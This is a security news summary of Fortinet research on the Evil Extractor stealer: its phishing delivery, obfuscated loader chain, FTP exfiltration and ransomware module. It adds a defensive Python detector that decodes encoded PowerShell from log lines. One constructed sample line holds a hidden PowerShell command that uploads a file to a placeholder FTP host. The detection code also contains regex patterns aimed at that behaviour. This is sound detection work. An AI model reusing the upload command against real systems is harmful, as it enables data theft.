
Researchers have spotted a stealer malware named Evil Extractor (originally marketed as an educational tool) being sold to other threat actors to steal data and files from Windows systems.
It has several modules that all work via an FTP service, and it also contains environment-checking and anti-VM functions. It primarily focuses on stealing browser data and information from compromised endpoints and then uploading it to the attacker's FTP server. The majority of victims are located in Europe and the U.S.
Sold by an actor named Kodex, it is continually updated and packs in various modules to siphon system metadata, passwords, and cookies from various web browsers, as well as to record keystrokes and even act as ransomware by encrypting files on the target system.
As part of the new campaign, the malware has been delivered through phishing emails that lure recipients into launching an executable that masquerades as a PDF document under the pretext of confirming their account details.
The Account_Info.exe binary is an obfuscated Python program designed to launch a .NET loader that uses a Base64-encoded PowerShell script to launch Evil Extractor. Besides gathering files, the malware can also activate the webcam and capture screenshots.
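The chain above ends in a .NET loader running a Base64-encoded PowerShell script that talks to an FTP server. The following is an added detection example, not code from the Fortinet report or from the malware: it decodes the `-EncodedCommand` argument (UTF-16LE, Base64) from process-creation log lines and flags the two traits the text describes, an FTP upload in the decoded body and a hidden window. The log lines, the loader path and the FTP address are constructed for the example.

```python
import base64
import re
from typing import Optional

def encode_ps(script: str) -> str:
    """Encode a script the way PowerShell's -EncodedCommand expects (UTF-16LE, Base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed process-creation log lines (hypothetical, not real telemetry). The second
# models a loader spawning hidden PowerShell whose body uploads over FTP; the third is benign.
SAMPLE_LOGS = [
    'ParentImage=C:\\Users\\u\\Downloads\\Account_Info.exe Image=cmd.exe CommandLine="cmd /c whoami"',
    'ParentImage=C:\\Users\\u\\AppData\\Local\\Temp\\loader.exe Image=powershell.exe CommandLine="powershell -w hidden -enc '
    + encode_ps("$c=New-Object Net.WebClient;$c.UploadFile('ftp://203.0.113.10/u','C:\\Temp\\out.zip')") + '"',
    'ParentImage=C:\\Windows\\explorer.exe Image=powershell.exe CommandLine="powershell -NoProfile -EncodedCommand '
    + encode_ps("Get-ChildItem C:\\Temp | Out-File C:\\Temp\\list.txt") + '"',
]

# -EncodedCommand and the prefix abbreviations PowerShell accepts for it.
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
FTP_HINT = re.compile(r"ftp://|FtpWebRequest|UploadFile", re.IGNORECASE)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if the command line carries an encoded command, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # malformed Base64 or not UTF-16LE: not a PowerShell encoded command

def triage(log_lines):
    """Decode encoded PowerShell in each line and flag FTP-upload and hidden-window traits."""
    findings = []
    for line in log_lines:
        decoded = decode_encoded_command(line)
        if decoded is None:
            continue
        reasons = []
        if FTP_HINT.search(decoded):
            reasons.append("ftp-upload")
        if HIDDEN.search(line):
            reasons.append("hidden-window")
        if reasons:
            findings.append({"line": line, "decoded": decoded, "reasons": reasons})
    return findings
```

Run `triage(SAMPLE_LOGS)` to see the one flagged line with its decoded body; in practice the same decode step is what lets a rule match on script content rather than on the opaque Base64 string.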
The report concludes that Evil Extractor is being used as a comprehensive info stealer with multiple malicious features, including ransomware, and that its PowerShell script can elude detection inside a .NET loader or PyArmor.
This research was documented by researchers from Fortinet.
Indicators of Compromise